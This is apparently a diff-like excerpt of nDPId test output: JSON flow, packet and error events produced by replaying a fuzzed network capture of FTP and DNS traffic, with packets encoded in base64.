00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":69,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635048,"flow_last_seen":1120469635048,"flow_idle_time":7560000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":59,"flow_avg_l4_payload_len":59,"midstream":1,"thread_ts_msec":1120469635048,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"192.168.1.2","src_port":21,"dst_port":2732,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00545{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":69,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":1,"flow_last_seen":1120469635048,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":113,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":113,"pkt_l4_len":79,"thread_ts_msec":1120469635048,"pkt":"AODtAW69ADBUADRWCABFEABjeQ9AADkGcOST6gH9wKgBAgAVCqzlH5bBr53DLFAYYzY9pwAAIEZpbGVzIGxhcmdlciB0aGVuIDI1ME1CIHdpbGwgYmUgZGVsZXRlZCBhZnRlciA1IGRheXMgISEhDQo="}
00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":74,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635049,"flow_last_seen":1120469635049,"flow_idle_time":7560000,"flow_min_l4_payload_len":3,"flow_max_l4_payload_len":3,"flow_tot_l4_payload_len":3,"flow_avg_l4_payload_len":3,"midstream":1,"thread_ts_msec":1120469635049,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"192.168.1.2","src_port":1045,"dst_port":2720,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":74,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":1,"flow_last_seen":1120469635049,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":23,"thread_ts_msec":1120469635049,"pkt":"AODtAW69ADBUADRWCABFEAAreRJAADkGcRmT6gH9wKgBAgQVCqDlH5cvr53DLFAYYzbRJQAAIA0KAAAA"}
00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":77,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635052,"flow_last_seen":1120469635052,"flow_idle_time":7560000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":41,"flow_tot_l4_payload_len":41,"flow_avg_l4_payload_len":41,"midstream":1,"thread_ts_msec":1120469635052,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"192.168.65.2","src_port":21,"dst_port":2720,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00519{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":77,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":1,"flow_last_seen":1120469635052,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":95,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":95,"pkt_l4_len":61,"thread_ts_msec":1120469635052,"pkt":"AODtAW69ADBUADRWCABFEABReRRAADkGcPGT6gH9wKhBAgAVCqDlH5dFr53DLFAYYzYwqgAAMjMwIEd1ZXN0IGFjY2VzcyBncmFudGVkIGZvciBhbm9ueW1vdSVzAAo="}
00195{"error_event_id":2,"error_event_name":"Unknown L3 protocol","datalink":1,"packet_id":78,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","protocol":2048,"global_ts_msec":1120469635053}
00367{"packet_event_id":1,"packet_event_name":"packet","packet_id":78,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":62,"pkt_l4_len":0,"thread_ts_msec":1120469635052,"pkt":"ADBUADRWAODtAW69CADFAAAwabhAAIAGOX7AqAECk+oB\/QqgABWvncMs5R+XblAYP7tMeAAAVFlQRSBJDQo="}
00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":79,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635105,"flow_last_seen":1120469635105,"flow_idle_time":7440000,"flow_min_l4_payload_len":19,"flow_max_l4_payload_len":19,"flow_tot_l4_payload_len":19,"flow_avg_l4_payload_len":19,"midstream":1,"thread_ts_msec":1120469635105,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"84.168.1.2","src_port":21,"dst_port":2720,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":79,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":1,"flow_last_seen":1120469635105,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":73,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":73,"pkt_l4_len":39,"thread_ts_msec":1120469635105,"pkt":"AODtAW69ADBUADRWCABFEAA7eRVAADkGcQaT6gH9VKgBAgAVCqDlH5dur53DNFAYYzYlcwAAMjAwIFR5cGUgc2V0IHRvIEkNCg=="}
00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":80,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635106,"flow_last_seen":1120469635106,"flow_idle_time":7440000,"flow_min_l4_payload_len":6,"flow_max_l4_payload_len":6,"flow_tot_l4_payload_len":6,"flow_avg_l4_payload_len":6,"midstream":1,"thread_ts_msec":1120469635106,"l3_proto":"ip4","src_ip":"192.112.1.2","dst_ip":"147.234.1.253","src_port":2720,"dst_port":21,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":80,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":1,"flow_last_seen":1120469635106,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":26,"thread_ts_msec":1120469635106,"pkt":"ADBUADRWAODtAW69CABFAAAuablAAIAGOX\/AcAECk+oB\/QqgABWvncM05R+XgVAYP6htwgAAUEFTVg0K"}
00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":79,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635105,"flow_last_seen":1120469635105,"flow_idle_time":7560000,"flow_min_l4_payload_len":19,"flow_max_l4_payload_len":19,"flow_tot_l4_payload_len":19,"flow_avg_l4_payload_len":19,"midstream":1,"thread_ts_msec":1120469635105,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"84.168.1.2","src_port":21,"dst_port":2720,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":79,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":1,"flow_last_seen":1120469635105,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":73,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":73,"pkt_l4_len":39,"thread_ts_msec":1120469635105,"pkt":"AODtAW69ADBUADRWCABFEAA7eRVAADkGcQaT6gH9VKgBAgAVCqDlH5dur53DNFAYYzYlcwAAMjAwIFR5cGUgc2V0IHRvIEkNCg=="}
00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":80,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635106,"flow_last_seen":1120469635106,"flow_idle_time":7560000,"flow_min_l4_payload_len":6,"flow_max_l4_payload_len":6,"flow_tot_l4_payload_len":6,"flow_avg_l4_payload_len":6,"midstream":1,"thread_ts_msec":1120469635106,"l3_proto":"ip4","src_ip":"192.112.1.2","dst_ip":"147.234.1.253","src_port":2720,"dst_port":21,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":80,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":1,"flow_last_seen":1120469635106,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":26,"thread_ts_msec":1120469635106,"pkt":"ADBUADRWAODtAW69CABFAAAuablAAIAGOX\/AcAECk+oB\/QqgABWvncM05R+XgVAYP6htwgAAUEFTVg0K"}
00215{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":81,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":72,"global_ts_msec":1120469635127}
00428{"packet_event_id":1,"packet_event_name":"packet","packet_id":81,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":106,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":106,"pkt_l4_len":0,"thread_ts_msec":1120469635106,"pkt":"AODtAW69ADBUADRWCABFqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqg=="}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":82,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635128,"flow_last_seen":1120469635128,"flow_idle_time":7440000,"flow_min_l4_payload_len":19,"flow_max_l4_payload_len":19,"flow_tot_l4_payload_len":19,"flow_avg_l4_payload_len":19,"midstream":1,"thread_ts_msec":1120469635128,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"147.117.1.253","src_port":2720,"dst_port":21,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":82,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":1,"flow_last_seen":1120469635128,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":73,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":73,"pkt_l4_len":39,"thread_ts_msec":1120469635128,"pkt":"ADBUADRWAODtAW6zCABFAAA7aU1AAIAGOXHAqAECk3UB\/QqgABWvHcM65R+X+lAYP3SxkwAAUkVUUiBTaXRlJXMAdC54bWwNCg=="}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":82,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635128,"flow_last_seen":1120469635128,"flow_idle_time":7560000,"flow_min_l4_payload_len":19,"flow_max_l4_payload_len":19,"flow_tot_l4_payload_len":19,"flow_avg_l4_payload_len":19,"midstream":1,"thread_ts_msec":1120469635128,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"147.117.1.253","src_port":2720,"dst_port":21,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":82,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":1,"flow_last_seen":1120469635128,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":73,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":73,"pkt_l4_len":39,"thread_ts_msec":1120469635128,"pkt":"ADBUADRWAODtAW6zCABFAAA7aU1AAIAGOXHAqAECk3UB\/QqgABWvHcM65R+X+lAYP3SxkwAAUkVUUiBTaXRlJXMAdC54bWwNCg=="}
00215{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":83,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":28,"global_ts_msec":1120469635129}
00367{"packet_event_id":1,"packet_event_name":"packet","packet_id":83,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":62,"pkt_l4_len":0,"thread_ts_msec":1120469635128,"pkt":"ADBUADRWAODtAW69CABFAAB6abtAAIAGOXvAqAEGk+oB\/Qqh5ncb6piKAAAAAHACQABGAAAAAgQFtAkBBAI="}
00198{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":84,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","layer_type":43690,"global_ts_msec":1120469635147}
00415{"packet_event_id":1,"packet_event_name":"packet","packet_id":84,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":99,"pkt_type":43690,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":99,"pkt_l4_len":0,"thread_ts_msec":1120469635128,"pkt":"qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq"}
00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":85,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635152,"flow_last_seen":1120469635152,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1120469635152,"l3_proto":"ip4","src_ip":"37.115.0.253","dst_ip":"192.168.1.2","src_port":58999,"dst_port":2721,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":85,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":1,"flow_last_seen":1120469635152,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1120469635152,"pkt":"AODtAW69ADBUADRWCABFAAAweRhAADkGcR4lcwD9wKgBAuZ3CqHlIbocG+qYi3ASYzaDqwAAAQEEAgIEBYM="}
00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":85,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635152,"flow_last_seen":1120469635152,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1120469635152,"l3_proto":"ip4","src_ip":"37.115.0.253","dst_ip":"192.168.1.2","src_port":58999,"dst_port":2721,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":85,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":1,"flow_last_seen":1120469635152,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1120469635152,"pkt":"AODtAW69ADBUADRWCABFAAAweRhAADkGcR4lcwD9wKgBAuZ3CqHlIbocG+qYi3ASYzaDqwAAAQEEAgIEBYM="}
00217{"error_event_id":13,"error_event_name":"TCP packet smaller than expected","datalink":1,"packet_id":86,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","size":54,"expected":62,"global_ts_msec":1120469635152}
00357{"packet_event_id":1,"packet_event_name":"packet","packet_id":86,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":42,"pkt_len":54,"pkt_l4_len":12,"thread_ts_msec":1120469635152,"pkt":"ADBUADRWAODtAW69CABHAAAoabxAAIAGOYLAqAECk+oB\/Qqh5ncb6piL5SG6HVAQQiTRUAAA"}
00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":87,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635153,"flow_last_seen":1120469635153,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1120469635153,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"147.234.1.253","src_port":2721,"dst_port":58999,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":87,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":1,"flow_last_seen":1120469635153,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1120469635153,"pkt":"ADBUADRWAODtAW69CABFAAAoab1AAIAGOYHAqAECk+oB\/Qqh5ncb6piL5SG6HVARQiTRTwAA"}
00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":89,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635173,"flow_last_seen":1120469635173,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1120469635173,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"192.232.1.2","src_port":58999,"dst_port":2721,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":89,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":1,"flow_last_seen":1120469635173,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1120469635173,"pkt":"AODtAW69ADBUADRWCABFAAAoeRlAADkGcSWT6gH9wOgBAuZ3CqHlIbodG+qYjFAQYzawPQAAAAAAAAAA"}
00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":93,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635179,"flow_last_seen":1120469635179,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1120469635179,"l3_proto":"ip4","src_ip":"37.115.0.2","dst_ip":"147.234.1.253","src_port":2639,"dst_port":21,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":93,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":1,"flow_last_seen":1120469635179,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1120469635179,"pkt":"ADBUADRWAODtAW69CABFAAAoacBAAIAGOX4lcwACk+oB\/QpPABWvncNU5R+X8VAQPzkeUQAA"}
00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":87,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635153,"flow_last_seen":1120469635153,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1120469635153,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"147.234.1.253","src_port":2721,"dst_port":58999,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":87,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":1,"flow_last_seen":1120469635153,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1120469635153,"pkt":"ADBUADRWAODtAW69CABFAAAoab1AAIAGOYHAqAECk+oB\/Qqh5ncb6piL5SG6HVARQiTRTwAA"}
00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":89,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635173,"flow_last_seen":1120469635173,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1120469635173,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"192.232.1.2","src_port":58999,"dst_port":2721,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":89,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":1,"flow_last_seen":1120469635173,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1120469635173,"pkt":"AODtAW69ADBUADRWCABFAAAoeRlAADkGcSWT6gH9wOgBAuZ3CqHlIbodG+qYjFAQYzawPQAAAAAAAAAA"}
00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":93,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635179,"flow_last_seen":1120469635179,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1120469635179,"l3_proto":"ip4","src_ip":"37.115.0.2","dst_ip":"147.234.1.253","src_port":2639,"dst_port":21,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":93,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":1,"flow_last_seen":1120469635179,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1120469635179,"pkt":"ADBUADRWAODtAW69CABFAAAoacBAAIAGOX4lcwACk+oB\/QpPABWvncNU5R+X8VAQPzkeUQAA"}
00215{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":97,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":58,"global_ts_msec":1120469638585}
00414{"packet_event_id":1,"packet_event_name":"packet","packet_id":97,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":92,"pkt_l4_len":0,"thread_ts_msec":1120469637833,"pkt":"\/\/\/\/\/7\/\/AODtAW69CABFAABeacMAAIARTIrAqAECwKgB\/wCJAIkAOluqhPEBEAABAAAAAAB0IEVGRURFSkZQRUVFUEVORUJFSkVPQ0FDQUNBQ0FDQUJNAAAgAAE="}
00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":100,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469663172,"flow_last_seen":1120469663172,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469663172,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.136.1.1","src_port":2722,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
@@ -198,10 +198,10 @@
00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1120469572841,"flow_last_seen":1120469572842,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1120469781470,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2714,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120469573246,"flow_last_seen":1120469578248,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469781470,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2715,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00590{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469590256,"flow_last_seen":1120469590256,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120469781470,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2716,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00607{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":131,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635153,"flow_last_seen":1120469635153,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1120469781470,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"147.234.1.253","src_port":2721,"dst_port":58999,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
